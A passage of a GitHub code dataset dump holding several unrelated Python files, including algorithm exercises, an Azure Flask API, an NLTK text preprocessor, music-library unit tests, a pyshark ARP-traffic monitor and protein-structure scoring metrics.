20, 15}, 20 is the only \n# peak element. For input array {10, 20, 15, 2, 23, 90, 67}, there are two peak elements: 20 and 90. Note that we need to \n# return any one peak element.\n\n# Following corner cases give better idea about the problem.\n# 1) If input array is sorted in strictly increasing order, the last element is always a peak element. For example, 50 is \n# peak element in {10, 20, 30, 40, 50}.\n# 2) If input array is sorted in strictly decreasing order, the first element is always a peak element. 
For example, 100 is the peak \n# element in {100, 80, 60, 50, 20}.\n# 3) If all elements of the input array are the same, every element is a peak element\n\n\n# A simple O(n) solution is to iterate over the array and check each element's left and right neighbours; if both are\n# smaller, then return the element\n\n# def findPeakVal(listOfNumbers):\n# \tn = len(listOfNumbers)\n# \tfor i in range(n):\n# \t\tif i == 0:\n# \t\t\tif listOfNumbers[i] >= listOfNumbers[i+1]:\n# \t\t\t\treturn listOfNumbers[i]\n# \t\telif i == n-1:\n# \t\t\tif listOfNumbers[i] >= listOfNumbers[i-1]:\n# \t\t\t\treturn listOfNumbers[i]\n# \t\telse:\n# \t\t\tif listOfNumbers[i] >= listOfNumbers[i+1] and listOfNumbers[i] >= listOfNumbers[i-1]:\n# \t\t\t\treturn listOfNumbers[i]\n\n# print(findPeakVal([10,10,10,10,10,10]))\n\n\n# O(logn) solution using binary search on the unsorted array\n# if the mid element is not smaller than both of its neighbours, return the element\n# else if the mid element is less than the left element, the peak is in the left half; do binary search in the left half\n# else if the mid element is less than the right element, the peak is in the right half; do binary search in the right half\n\ndef findPeakVal(listOfNumbers,start,end):\n\tif start <= end:\n\t\tmid = (start+end)//2\n\t\tif (mid == 0):\n\t\t\tif listOfNumbers[mid] >= listOfNumbers[mid+1]:\n\t\t\t\treturn listOfNumbers[mid]\n\t\telif mid == end:\n\t\t\tif listOfNumbers[mid] >= listOfNumbers[mid-1]:\n\t\t\t\treturn listOfNumbers[mid]\n\t\telse:\n\t\t\tif listOfNumbers[mid] >= listOfNumbers[mid-1] and listOfNumbers[mid] >= listOfNumbers[mid+1]:\n\t\t\t\treturn listOfNumbers[mid]\n\t\tif listOfNumbers[mid] < listOfNumbers[mid-1]:\n\t\t\treturn findPeakVal(listOfNumbers,start,mid-1)\n\t\telif listOfNumbers[mid] < listOfNumbers[mid+1]:\n\t\t\treturn findPeakVal(listOfNumbers,mid+1,end)\n\nlistOfNumbers = [100, 80, 60, 50, 20]\nprint(findPeakVal(listOfNumbers,0,len(listOfNumbers)-1))\n","repo_name":"zack4114/Amazon-Questions","sub_path":"FindPeakElement.py","file_name":"FindPeakElement.py","file_ext":"py","file_size_in_byte":2544,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"40172629780","text":"from flask import Blueprint, jsonify, request\nfrom utils import exceptions\nfrom utils.plane import PlaneEnum\nfrom command.controller.specs_manager import AAZSpecsManager\n\n\nbp = Blueprint('specs', __name__, url_prefix='/AAZ/Specs')\n\n\n# modules\n@bp.route(\"/CommandTree/Nodes/\", methods=(\"GET\",))\ndef command_tree_node(node_names):\n    if node_names[0] != AAZSpecsManager.COMMAND_TREE_ROOT_NAME:\n        raise exceptions.ResourceNotFind(\"Command group not exist\")\n    node_names = node_names[1:]\n\n    manager = AAZSpecsManager()\n    node = manager.find_command_group(*node_names)\n    if not node:\n        raise exceptions.ResourceNotFind(\"Command group not exist\")\n\n    result = node.to_primitive()\n    return jsonify(result)\n\n\n@bp.route(\"/CommandTree/Nodes//Leaves/\", methods=(\"GET\",))\ndef command_tree_leaf(node_names, leaf_name):\n    if node_names[0] != AAZSpecsManager.COMMAND_TREE_ROOT_NAME:\n        raise exceptions.ResourceNotFind(\"Command not exist\")\n    node_names = node_names[1:]\n\n    manager = AAZSpecsManager()\n    leaf = manager.find_command(*node_names, leaf_name)\n    if not leaf:\n        raise exceptions.ResourceNotFind(\"Command not exist\")\n\n    result = leaf.to_primitive()\n    return jsonify(result)\n\n\n@bp.route(\"/CommandTree/Nodes//Leaves//Versions/\", methods=(\"GET\",))\ndef aaz_command_in_version(node_names, leaf_name, 
version_name):\n    if node_names[0] != AAZSpecsManager.COMMAND_TREE_ROOT_NAME:\n        raise exceptions.ResourceNotFind(\"Command not exist\")\n    node_names = node_names[1:]\n\n    manager = AAZSpecsManager()\n    leaf = manager.find_command(*node_names, leaf_name)\n    if not leaf:\n        raise exceptions.ResourceNotFind(\"Command not exist\")\n\n    version = None\n    for v in (leaf.versions or []):\n        if v.name == version_name:\n            version = v\n            break\n\n    if not version:\n        raise exceptions.ResourceNotFind(\"Command of version not exist\")\n\n    cfg_reader = manager.load_resource_cfg_reader_by_command_with_version(\n        leaf, version=version)\n    cmd_cfg = cfg_reader.find_command(*leaf.names)\n\n    result = cmd_cfg.to_primitive()\n    del result['name']\n    result.update({\n        'names': leaf.names,\n        'help': leaf.help.to_primitive(),\n        'stage': version.stage,\n    })\n    if version.examples:\n        result['examples'] = version.examples.to_primitive()\n\n    return jsonify(result)\n\n\n@bp.route(\"/Resources//\", methods=(\"GET\", ))\ndef get_resource(plane, resource_id):\n    manager = AAZSpecsManager()\n    versions = manager.get_resource_versions(plane, resource_id)\n    if versions is None:\n        raise exceptions.ResourceNotFind(\"Resource not exist\")\n    result = {\n        \"id\": resource_id,\n        \"versions\": versions\n    }\n    return jsonify(result)\n\n\n@bp.route(\"/Resources//Filter\", methods=(\"Post\", ))\ndef filter_resources(plane):\n    data = request.get_json()\n    if 'resources' not in data:\n        raise exceptions.InvalidAPIUsage(\"Invalid request body\")\n    manager = AAZSpecsManager()\n\n    result = {\n        'resources': []\n    }\n    for resource_id in data['resources']:\n        versions = manager.get_resource_versions(plane, resource_id)\n        if versions is None:\n            continue\n        result['resources'].append({\n            \"id\": resource_id,\n            \"versions\": versions,\n        })\n\n    return jsonify(result)\n\n\n# planes\n@bp.route(\"/Planes\", methods=(\"Get\", ))\ndef list_planes():\n    result = []\n    for name, items in PlaneEnum._config.items():\n        result.append({\n            \"name\": name,\n            **items,\n        })\n    return jsonify(result)\n","repo_name":"Azure/aaz-dev-tools","sub_path":"src/aaz_dev/command/api/specs.py","file_name":"specs.py","file_ext":"py","file_size_in_byte":3733,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"21"} +{"seq_id":"43037937257","text":"# Forward-propagating (distributing) DP over subsets\n# S: set of vertices already visited, a: a vertex not yet visited, i: the current vertex\n# DP[S][i]: minimum path cost so far in the state where S has been visited and we are currently at i\n# DP[null][0] = 0\n# DP[ALL][0] = answer\ndef main():\n    node_end, edge_end = map(int, input().split())\n    nei_of = [[] for _ in range(node_end)]\n    for _ in range(edge_end):\n        fr, to, di = map(int, input().split())\n        nei_of[fr].append((to, di))\n\n    INF = float('inf')\n    ALL = 1 << node_end\n    DP = [[INF] * node_end for _ in range(ALL)]\n    DP[0][0] = 0\n\n    for cur_S in range(ALL):\n        for i in range(node_end):\n            for a, di in nei_of[i]:\n                # process only the case where a is not in S\n                if (cur_S >> a) & 1:\n                    continue\n                nex_S = cur_S | (1 << a)\n                DP[nex_S][a] = min(DP[nex_S][a], DP[cur_S][i] + di)\n\n    ans = DP[ALL-1][0]\n    if ans == INF:\n        ans = -1\n    print(ans)\n\n\nmain()\n","repo_name":"batamorphism/coding","sub_path":"Python/AtCoder/old/DPL_2_A_0119.py","file_name":"DPL_2_A_0119.py","file_ext":"py","file_size_in_byte":977,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"22435689755","text":"class Solution(object):\n    def numPairsDivisibleBy60(self, time):\n        \"\"\"\n        :type time: List[int]\n        :rtype: int\n        \"\"\"\n        d = {}\n        for mins in time:\n            key = mins%60\n            d[key] = d.setdefault(key, 0) + 1\n        result = 0\n        for 
key, value in d.items():\n            if key == 0 or key == 30:\n                if value >= 2:\n                    result += value * (value-1)\n            else:\n                if 60-key in d:\n                    result += value * (d[60-key])\n        return result//2\n","repo_name":"muskaan-codes/leetcoding-challenges","sub_path":"DecemberCodinChallenge/Day-8-Pairs-of-Songs-With-Total-Durations-Divisible-by-60.py","file_name":"Day-8-Pairs-of-Songs-With-Total-Durations-Divisible-by-60.py","file_ext":"py","file_size_in_byte":552,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"21548613835","text":"#!/usr/local/bin\n\n# Analyze open option positions\n\n# get all open positions in account\n# return greeks and other info\n# inform if it should be closed or held\n\nfrom robin_stocks import robinhood as rs\n\n# Modules\nimport functions\nimport SMA\n\n\ndef analyze_stock_positions():\n    stock_positions = rs.account.get_open_stock_positions(info=None)\n    return_data = []\n    for stock in stock_positions:\n        d = {}\n        url = stock['instrument']\n        symbol = rs.stocks.get_symbol_by_url(url)\n        average_buy_price = stock['average_buy_price']\n        price = rs.stocks.get_latest_price(symbol, priceType=None, includeExtendedHours=True)\n        quantity = stock['quantity']\n        equity = round(float(price[0]) * float(quantity), 2)\n        profit_loss = round(equity - float(average_buy_price) * float(quantity), 2)\n        profit_loss_percent = round(100 * profit_loss / (float(average_buy_price) * float(quantity)), 2)\n        earnings = functions.get_upcoming_earnings(symbol)\n        \n        d['symbol'] = symbol\n        d['average_buy_price'] = average_buy_price\n        d['price'] = price[0]\n        d['quantity'] = quantity\n        d['equity'] = float(price[0]) * float(quantity)\n        d['profit_loss'] = profit_loss\n        d['profit_loss_percent'] = profit_loss_percent\n        #d['earnings'] = earnings\n\n        return_data.append(d)\n\n    #print(return_data)\n    return return_data\n\n\ndef analyze_option_positions():\n    option_positions = rs.options.get_open_option_positions(info=None)\n    return_data = []\n    for option in option_positions:\n        d = {}\n        option_id = option['option_id']\n        get_option_data = rs.options.get_option_instrument_data_by_id(option_id,info=None)\n        d['chain_symbol'] = option['chain_symbol']\n        d['short_or_long'] = option['type']\n        d['quantity'] = option['quantity']\n        d['expiration_date'] = get_option_data['expiration_date']\n        d['strike_price'] = get_option_data['strike_price']\n        return_data.append(d)\n    return return_data\n\n\n#analyze_stock_positions()\n#analyze_option_positions()\n","repo_name":"mohobson/marketdata","sub_path":"analyzepositions.py","file_name":"analyzepositions.py","file_ext":"py","file_size_in_byte":2087,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"39970096986","text":"import nltk\nnltk.download(\"stopwords\")\nnltk.download(\"wordnet\")\nfrom nltk.tokenize import word_tokenize\nfrom nltk.tokenize import TweetTokenizer\nfrom nltk.stem import WordNetLemmatizer\nfrom nltk.corpus import stopwords\nimport string \nimport re\n\nclass Preprocess:\n    ''' \n    This class is used to preprocess text using various techniques. It preprocesses the given review text. \n    How to use\n    >>> pre = Preprocess()\n    >>> pre.preprocessing(\"Your sentence goes here\")\n    ['sentence', 'go']\n    Will return the preprocessed sentence in the form of a list\n    '''\n    \n    def __init__(self):\n        ''' \n        Initializer function. 
Initializes the various helper objects.\n        '''\n        \n        # Initializing the wordnet Lemmatizer\n        self.lemmatizer = WordNetLemmatizer()\n        \n        # Initializing the Tweet Tokenizer\n        self.tweettoken=TweetTokenizer()\n        \n        # getting the list of all stop words from nltk\n        self.stop_words = set(stopwords.words('english'))\n\n        # now some of the words are removed from the stopword list, because these words specifically indicate a negative sentiment \n        self.stop_words.discard(\"not\")\n        self.stop_words.discard(\"didn't\")\n        self.stop_words.discard(\"doesn't\")\n        self.stop_words.discard(\"wasn't\")\n        self.stop_words.discard(\"shouldn't\")\n        self.stop_words.discard(\"needn't\")\n        self.stop_words.discard(\"hasn't\")\n        self.stop_words.discard(\"haven't\")\n        self.stop_words.discard(\"hadn't\")\n        self.stop_words.discard(\"don't\")\n        \n        # some words that have to be removed ... unnecessary words\n        self.remove_words=[\".\",\"..\",\"...\"]\n    \n    def sent_tokenize(self,data):\n        '''\n        Used to break the review into sentences. But we don't need to break the review into sentences\n        '''\n        \n        # joining all the sentences in the review by removing '.' \n        data=data.replace(\".\",\" \")\n        return data\n\n    def word_tokenize(self,sent):\n        '''\n        Breaks the sentence into tokens. \n        The Tweet Tokenizer has been specifically used for this task \n        since the reviews were free text and contained emojis \n        and various other non-important, non-relevant information\n        '''\n        return self.tweettoken.tokenize(sent)\n    \n    def lemmatize(self,word):\n        '''\n        This function lemmatizes the word and brings it to a common word format.\n        Also, # is removed from hashtag words ... so that they can be processed further\n        '''\n        if(\"#\" in word):\n            word=word.replace(\"#\",\"\")\n        return self.lemmatizer.lemmatize(word)\n    \n    def is_stop_word(self,word):\n        '''\n        Function used to check if a given word lies in our stopword list\n        '''\n        if(word.lower() in self.stop_words):\n            return True\n        return False\n    \n    def has_number(self,word):\n        '''\n        Used to check if a word has a number\n        '''\n        return any(char.isdigit() for char in word)\n    \n    def deEmojify(self, word):\n        '''\n        used to remove emoji from a word\n        '''\n        return word.encode('ascii', 'ignore').decode('ascii')\n\n    def is_extra_word(self,word):\n        '''\n        Checks for all extra words by calling the various functions defined above:\n        punctuation tokens, words containing numbers, @ words, stop words\n        and any special words that have been marked in the remove_words list\n        '''\n        if(self.has_number(word.lower())):\n            return True\n        if('@' in word.lower()):\n            return True\n        if(self.is_stop_word(word.lower())):\n            return True\n        if(word.lower() in string.punctuation):\n            return True\n        if(word.lower() in self.remove_words):\n            return True\n        if(len(word)==0):\n            return True\n        return False\n    \n    def reduce_lengthening(self,word):\n        '''\n        Shortens a word if characters in it repeat:\n        it is reduced to having at most 2 repeating chars.\n        For eg:- aweeeesome => aweesome\n        '''\n        pattern = re.compile(r\"(.)\\\1{2,}\")\n        return pattern.sub(r\"\\\1\\\1\", word)\n    \n    def preprocessing(self,data):\n        '''\n        This method uses all the above methods to preprocess a complete review.\n        The argument given is the review which we want to process.\n        '''\n        \n        # joining all the sentences in a review\n        sents=self.sent_tokenize(data)\n        # splitting a sentence into words\n        word_tokenized=self.word_tokenize(sents)\n        \n        # processing all the words and applying the various functions\n        words=[]\n        for j in word_tokenized:\n            w=j.lower()\n            w=self.deEmojify(w)\n            
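# collapse characters repeated three or more times, e.g. aweeeesome -> aweesome\n            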
w=self.reduce_lengthening(w)\n w=self.lemmatize(w)\n if(self.is_extra_word(w)==False):\n words.append(w)\n return words\n","repo_name":"thesagarsehgal/ReviewRatingClassifier","sub_path":"src/classifier/preprocessing.py","file_name":"preprocessing.py","file_ext":"py","file_size_in_byte":4980,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"37865758405","text":"import os\nimport unittest\nfrom shutil import copyfile\nfrom library import Song, Playlist\n\n\nclass TestSong(unittest.TestCase):\n \n def setUp(self):\n self.song = Song(title=\"Odin\", \n artist=\"Manowar\", \n album=\"The Sons of Odin\", \n length=\"3:44\")\n self.second_song = Song(title=\"Odin\", \n artist=\"Manowar\", \n album=\"The Sons of Odin\", \n length=\"3:44\")\n self.better_song = Song(title=\"Habibi\", \n artist=\"Azis\", \n album=\"Napipai gooo\", \n length=\"5:16\")\n\n def test__str__(self):\n self.assertEqual(str(self.song), \n \"Manowar - Odin from The Sons of Odin - 3:44\")\n\n def test__eq__(self):\n self.assertTrue(self.song==self.second_song)\n self.assertFalse(self.song==self.better_song)\n\n def test__hash__(self):\n self.assertTrue(self.song.__hash__() == self.second_song.__hash__())\n self.assertFalse(self.song.__hash__() == self.better_song.__hash__())\n\n def test_length(self):\n self.assertEqual(self.song.length(seconds=True), '224')\n self.assertEqual(self.song.length(minutes=True), '3.73')\n self.assertEqual(self.song.length(hours=True), '0.06')\n self.assertEqual(self.song.length(), self.song._length)\n\n\nclass TestPlaylist(unittest.TestCase):\n\n def setUp(self):\n self.playlist = Playlist(name=\"Code\", repeat=True, shuffle=True)\n # Song instances:\n self.song = Song(title=\"Odin\", \n artist=\"Manowar\", \n album=\"The Sons of Odin\", \n length=\"3:44\")\n self.second_song = Song(title=\"Thor\", \n artist=\"Manowar\", \n album=\"The Sons of Odin\", \n length=\"4:32\")\n self.better_song = Song(title=\"Habibi\", \n artist=\"Azis\", \n album=\"Napipai gooo\", \n length=\"5:16\")\n \n def test_add_song(self):\n self.assertEqual(len(self.playlist.song_list), 0)\n self.playlist.add_song(self.song)\n self.assertEqual(len(self.playlist.song_list), 1)\n\n def test_remove_song(self):\n self.playlist.song_list = [self.song, \n self.second_song, \n self.better_song]\n self.assertEqual(len(self.playlist.song_list), 3)\n self.assertTrue(self.playlist.remove_song(self.song)) \n self.assertEqual(len(self.playlist.song_list), 2)\n self.assertFalse(self.playlist.remove_song(self.song))\n self.assertTrue(self.playlist.remove_song(self.second_song))\n self.assertTrue(self.playlist.remove_song(self.better_song)) \n self.assertEqual(len(self.playlist.song_list), 0)\n \n def test_add_songs(self):\n self.assertEqual(len(self.playlist.song_list), 0)\n self.playlist.add_songs([self.song, \n self.second_song, \n self.better_song])\n self.assertEqual(len(self.playlist.song_list), 3)\n\n def test_total_length(self):\n self.playlist.add_songs([self.song, \n self.second_song, \n self.better_song])\n self.assertEqual(self.playlist.total_length(), '13:32')\n\n def test_artists(self):\n self.assertFalse(self.playlist.artists())\n self.playlist.add_songs([self.song, \n self.second_song, \n self.better_song])\n self.assertEqual(self.playlist.artists(), \n {'Manowar': 2, 'Azis': 1})\n\n def test_next_song(self):\n self.assertEqual(self.playlist.next_song(), False)\n self.playlist.add_songs([self.song, \n self.second_song, \n self.better_song])\n self.playlist.repeat = 
False\n self.playlist.shuffle = False\n self.playlist.next_song()\n self.assertEqual(len(self.playlist.song_list), 2)\n self.assertEqual(len(self.playlist.played_songs), 1)\n self.playlist.next_song()\n self.playlist.next_song()\n self.assertEqual(len(self.playlist.song_list), 0)\n self.assertEqual(len(self.playlist.played_songs), 3)\n self.assertFalse(self.playlist.next_song())\n self.playlist.repeat = True\n self.playlist.next_song()\n self.assertEqual(len(self.playlist.song_list), 2)\n self.assertEqual(len(self.playlist.played_songs), 1)\n self.playlist.shuffle = True # TODO: implement randomness\n self.playlist.next_song()\n self.assertEqual(len(self.playlist.song_list), 1)\n self.assertEqual(len(self.playlist.played_songs), 2)\n self.playlist.next_song()\n self.assertEqual(len(self.playlist.song_list), 0)\n self.assertEqual(len(self.playlist.played_songs), 3)\n self.playlist.repeat = False\n self.assertFalse(self.playlist.next_song())\n \n def test_pprint_playlist(self):\n self.assertFalse(self.playlist.pprint_playlist())\n self.playlist.add_songs([self.song, \n self.second_song])\n self.assertEqual(self.playlist.pprint_playlist(),\n ['| Artist | Song | Length |',\n '| ------- | ---- | ------ |',\n '| Manowar | Odin | 3:44 |',\n '| Manowar | Thor | 4:32 |'])\n\n def test_save(self):\n self.playlist.name = ' '\n self.playlist.save()\n self.assertEqual(self.playlist.name, '-')\n os.remove('-.json')\n self.playlist.name = \"TestCode\"\n self.assertTrue(self.playlist.save())\n self.assertTrue(os.path.isfile('TestCode.json'))\n os.remove('TestCode.json')\n \n\n def test_load(self):\n self.assertFalse(Playlist.load('wrong.json'))\n copyfile('Code.json', 'test_code.json')\n new = Playlist.load('test_code.json')\n self.assertEqual(len(new.song_list), 3)\n os.remove('test_code.json')\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"alexanderbackup/Python-backup","sub_path":"hackbulgaria/week07/MusicLibrary/test_library.py","file_name":"test_library.py","file_ext":"py","file_size_in_byte":6429,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"41349596322","text":"import pandas as pd\nfrom Objects.Truck import *\n\n\ndef load_trucks_txt(filename):\n dataframe = pd.read_csv(filename, sep=';')\n if not dataframe.empty:\n trucks = []\n for _, row in dataframe.iterrows():\n trucks += [Truck(\n int(row['NODE_START_ID']),\n int(row['TRUCK_ID']),\n row['TRUCK_BRAND'],\n row['TRUCK_MODEL'],\n int(row['TRUCK_CAPACITY']),\n )]\n return trucks\n else:\n raise Exception(\"File is empty\")\n","repo_name":"diegoamusicr/MiningNSGA","sub_path":"Solver/Utils.py","file_name":"Utils.py","file_ext":"py","file_size_in_byte":535,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"6751636770","text":"import pyshark\nimport operator\n\ndef arp_sweep():\n capture = pyshark.LiveCapture(interface='wlp2s0', display_filter = \"arp\")\n capture.set_debug()\n print('CAPTURING')\n while True:\n mac_addresses={}\n arp_count=0\n under_attack = 0\n for packet in capture.sniff_continuously(packet_count=200):\n dest_mac = packet.eth.dst\n packet_type = str(packet.arp.opcode) \n if packet_type == '1':\n arp_count+=1\n src_mac = packet.eth.src\n if src_mac not in mac_addresses:\n mac_addresses[src_mac]=1;\n elif src_mac in mac_addresses:\n mac_addresses[src_mac]+=1\n if arp_count > 100:\n if under_attack == 0:\n print('EXCESSIVE ARP TRAFFIC DETECTED, SOURCE MAC: ', max(mac_addresses.items(), 
key=operator.itemgetter(1))[0])\n                    return \n            elif arp_count<100:\n                under_attack=0\n\narp_sweep()\n","repo_name":"namanr17/host-intrusion-detection-system","sub_path":"arp_sweep_live.py","file_name":"arp_sweep_live.py","file_ext":"py","file_size_in_byte":993,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"45677639455","text":"\"\"\"Functions for computing scoring metrics on proteins\r\n\"\"\"\r\nimport math\r\nfrom itertools import combinations\r\nfrom math import pi as PI  # noqa\r\nfrom typing import Optional, List, Tuple, Any\r\n\r\nimport torch\r\nfrom einops import repeat, rearrange  # noqa\r\nfrom torch import Tensor\r\n\r\nfrom protein_learning.common.helpers import (\r\n    get_eps,\r\n    calc_tm_torch,\r\n    default,\r\n    masked_mean,\r\n    exists,\r\n    safe_norm\r\n\r\n)\r\nfrom protein_learning.common.protein_constants import (\r\n    AA_INDEX_MAP,\r\n    ALL_ATOM_POSNS,\r\n)\r\nfrom protein_learning.common.rigids import Rigids\r\nfrom protein_learning.features.masking.masking_utils import get_chain_masks, get_partition_mask\r\nfrom protein_learning.protein_utils.align.kabsch_align import kabsch_align\r\n\r\n\r\ndef count_true(x: Tensor) -> int:\r\n    \"\"\"count the number of entries in x that are equal to True\"\"\"\r\n    return x[x].numel()\r\n\r\n\r\ndef tensor_to_list(x: Tensor) -> List:\r\n    \"\"\"Convert torch tensor to python list\"\"\"\r\n    return x.detach().cpu().numpy().tolist()\r\n\r\n\r\ndef tensor_to_array(x: Tensor) -> List:\r\n    \"\"\"Convert torch tensor to numpy array\"\"\"\r\n    return x.detach().cpu().numpy()\r\n\r\n\r\ndef get_sep_mask(n: int, min_sep: int, max_sep: int, device: Any) -> Tensor:\r\n    \"\"\"Get separation mask\"\"\"\r\n    rel_sep = torch.abs(repeat(torch.arange(n, device=device), \"i -> () i ()\") -\r\n                        repeat(torch.arange(n, device=device), \"i -> () () i\"))\r\n    # compute separation mask\r\n    max_sep = max_sep if max_sep > 0 else n\r\n    return torch.logical_and(rel_sep >= min_sep, rel_sep <= max_sep)  # noqa\r\n\r\n\r\ndef batch_coords(predicted_coords: Tensor, actual_coords: Tensor, batched_len: int):\r\n    \"\"\"(potentially) adds batch dimension to coordinates and returns whether\r\n    coordinates already had a batch dimension\r\n    \"\"\"\r\n    batched = predicted_coords.ndim == batched_len\r\n    actual = actual_coords if actual_coords.ndim == batched_len else actual_coords.unsqueeze(0)\r\n    pred = predicted_coords if predicted_coords.ndim == batched_len else predicted_coords.unsqueeze(0)\r\n    assert actual.ndim == pred.ndim == batched_len, f\"{actual.shape}, {pred.shape}, {batched_len}\"\r\n    return batched, actual, pred\r\n\r\n\r\ndef compute_coord_lddt(\r\n        predicted_coords: Tensor,\r\n        actual_coords: Tensor,\r\n        cutoff: float = 15.,\r\n        per_residue: bool = True,\r\n        pred_rigids: Optional[Rigids] = None,\r\n        pair_mask: Optional[Tensor] = None,\r\n        thresholds = None,\r\n\r\n) -> Tensor:\r\n    \"\"\"Computes LDDT of predicted and actual coords.\r\n\r\n    If rigids are provided, the pLDDT will be taken w.r.t the local frame\r\n    of the input.\r\n\r\n    :param pred_rigids: optional rigid frames for the prediction; if given, predicted\r\n        distances are measured in each residue's local frame\r\n    :param predicted_coords: tensor of shape (b, n, 3) or (n,3)\r\n    :param actual_coords: tensor of shape (b, n, 3) or (n,3)\r\n    :param cutoff: LDDT cutoff value\r\n    :param per_residue: whether to compute LDDT per-residue or for all coords.\r\n    :return: LDDT or pLDDT tensor\r\n    \"\"\"\r\n    thresholds = default(thresholds,[0.5,1,2,4]) # plddt cutoff thresholds\r\n    # reshape so that each set of coords has batch dimension\r\n    batched, actual_coords, predicted_coords 
= batch_coords(\r\n predicted_coords=predicted_coords,\r\n actual_coords=actual_coords,\r\n batched_len=3\r\n )\r\n n = predicted_coords.shape[1]\r\n actual_dists = torch.cdist(actual_coords, actual_coords)\r\n if not exists(pred_rigids):\r\n pred_dists = torch.cdist(predicted_coords, predicted_coords)\r\n else:\r\n rel_coords = pred_rigids.apply_inverse(rearrange(predicted_coords, \"b n c -> b () n c\"))\r\n pred_dists = safe_norm(rel_coords, dim=-1)\r\n\r\n not_self = (1 - torch.eye(n, device=pred_dists.device)).bool()\r\n mask = torch.logical_and(pred_dists < cutoff, not_self).float() # noqa\r\n if exists(pair_mask):\r\n mask = pair_mask.float() * mask\r\n l1_dists = torch.abs(pred_dists - actual_dists).detach()\r\n\r\n scores = (1/len(thresholds))*sum([(l1_dists < t).float() for t in thresholds])\r\n\r\n dims = (1, 2) if not per_residue else (2,)\r\n eps = get_eps(l1_dists)\r\n scale = 1 / (eps + torch.sum(mask, dim=dims))\r\n scores = eps + torch.sum(scores * mask, dim=dims)\r\n return scale * scores if batched else (scale * scores)[0]\r\n\r\n\r\ndef compute_interface_tm(\r\n predicted_coords: Tensor,\r\n actual_coords: Tensor,\r\n pred_rigids: Rigids,\r\n actual_rigids: Rigids,\r\n chain_indices: List[Tensor],\r\n normalize: bool = False,\r\n reduce: bool = False,\r\n):\r\n \"\"\"Interface TM score (Unnormalized and not reduced)\"\"\"\r\n tm_scale = lambda n: 0.5 if n <= 15 else 1.24 * ((n - 15.0) ** (1. / 3.)) - 1.8\r\n\r\n assert predicted_coords.ndim == actual_coords[0].ndim\r\n shape = predicted_coords.shape\r\n assert predicted_coords.ndim == 3, f\"input shape should be (b,n,3), got {shape}\"\r\n _, pair_masks, inter_pair_mask = get_chain_masks(n_res=actual_coords.shape[0], chain_indices=chain_indices)\r\n\r\n predicted_coords, actual_coords = map(lambda x: rearrange(x, \"b n c -> b () n c\"),\r\n (predicted_coords, actual_coords))\r\n pred_rel_coords = pred_rigids.apply_inverse(predicted_coords)\r\n actual_rel_coords = actual_rigids.apply_inverse(actual_coords)\r\n\r\n raise Exception(\"Not implemented\")\r\n\r\n\r\ndef get_inter_chain_contacts(\r\n coords: Tensor,\r\n partition: List[Tensor],\r\n atom_mask: Optional[Tensor],\r\n contact_thresh: float = 12,\r\n\r\n) -> Tensor:\r\n \"\"\"Get contact flags for pair features\"\"\"\r\n contacts = torch.cdist(coords.squeeze(), coords.squeeze())\r\n part_mask = get_partition_mask(n_res=sum([len(p) for p in partition]), partition=partition)\r\n part_mask = part_mask.to(contacts.device)\r\n contacts[~part_mask] = contact_thresh + 1\r\n pair_mask = torch.einsum(\"i,j->ij\", atom_mask, atom_mask)\r\n contacts[~pair_mask] = contact_thresh + 1\r\n return contacts < contact_thresh # noqa\r\n\r\n\r\ndef compute_interface_rmsd(\r\n predicted_coords: Tensor,\r\n actual_coords: Tensor,\r\n chain_indices: List[Tensor],\r\n atom_mask: Optional[Tensor],\r\n contact_thresh: float = 10,\r\n align: bool = True,\r\n):\r\n assert len(chain_indices) == 2\r\n assert predicted_coords.ndim == actual_coords.ndim == 2\r\n contacts = get_inter_chain_contacts(\r\n actual_coords,\r\n chain_indices,\r\n atom_mask=atom_mask,\r\n contact_thresh=contact_thresh\r\n )\r\n interface_mask = torch.any(contacts, dim=-1)\r\n assert interface_mask.shape == actual_coords.shape[:1]\r\n if exists(atom_mask):\r\n assert atom_mask.shape == interface_mask.shape\r\n interface_mask = interface_mask & atom_mask\r\n\r\n interface_coords_actual = actual_coords[interface_mask]\r\n interface_coords_pred = predicted_coords[interface_mask]\r\n atom_mask = 
torch.ones(interface_coords_actual.shape[0])\r\n return compute_coord_rmsd(\r\n predicted_coords=interface_coords_pred,\r\n actual_coords=interface_coords_actual,\r\n atom_mask=atom_mask.to(interface_mask.device).bool(),\r\n per_res=False,\r\n align=align,\r\n )\r\n\r\n\r\ndef compute_coord_tm(\r\n predicted_coords: Tensor,\r\n actual_coords: Tensor,\r\n norm_len: Optional[int] = None,\r\n align: bool = True\r\n) -> Tensor:\r\n \"\"\"Compute TM-Score of predicted and actual coordinates\r\n\r\n shape should be (b,n,3) or (n,3)\r\n \"\"\"\r\n assert predicted_coords.ndim <= 3\r\n # reshape so that each set of coords has batch dimension\r\n batched, actual_coords, predicted_coords = batch_coords(\r\n predicted_coords=predicted_coords,\r\n actual_coords=actual_coords,\r\n batched_len=3\r\n )\r\n if align:\r\n _, actual_coords = kabsch_align(align_to=predicted_coords, align_from=actual_coords)\r\n deviations = torch.norm(predicted_coords - actual_coords, dim=-1)\r\n norm_len = default(norm_len, predicted_coords.shape[1])\r\n tm = calc_tm_torch(deviations, norm_len=norm_len)\r\n return tm\r\n\r\n\r\ndef mean_aligned_error(\r\n predicted_coords: Tensor,\r\n actual_coords: Tensor,\r\n mask: Optional[Tensor],\r\n per_residue: bool,\r\n fn=lambda x: torch.square(x),\r\n align: bool = True,\r\n):\r\n \"\"\"mean per-residue error w.r.t given function\"\"\"\r\n # reshape so that each set of coords has batch dimension\r\n batched, actual_coords, predicted_coords = batch_coords(\r\n predicted_coords=predicted_coords,\r\n actual_coords=actual_coords,\r\n batched_len=4 if per_residue else 3\r\n )\r\n if exists(mask):\r\n mask = mask if batched else mask.unsqueeze(0)\r\n assert 